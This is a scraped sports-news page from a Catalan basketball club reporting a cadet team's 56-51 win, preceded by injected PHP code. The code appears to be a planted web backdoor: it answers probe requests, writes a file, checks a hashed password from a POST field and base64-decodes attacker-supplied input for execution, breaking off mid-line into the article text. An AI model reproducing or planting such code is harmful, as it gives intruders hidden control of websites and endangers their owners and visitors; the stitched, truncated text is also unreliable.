function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" La bona defensa del cadet masculí A en el tercer quart, clau contra el Manyanet (56-51) - Tgn Bàsquet Club -

La bona defensa del cadet masculí A en el tercer quart, clau contra el Manyanet (56-51)

Updated: febrer 14, 2017

El cadet masculí A del TGN Bàsquet va vèncer el Manyanet en un partit molt igualat. Els locals van començar bé, obrint forat, però els triples del Manyanet van igualar el matx. Una gran defensa local en el tercer quart (15-4 de parcial) va ser clau. Els visitants no trobaven el cèrcol i els lila van agafar un avantatge que ja no van abandonar fins al final.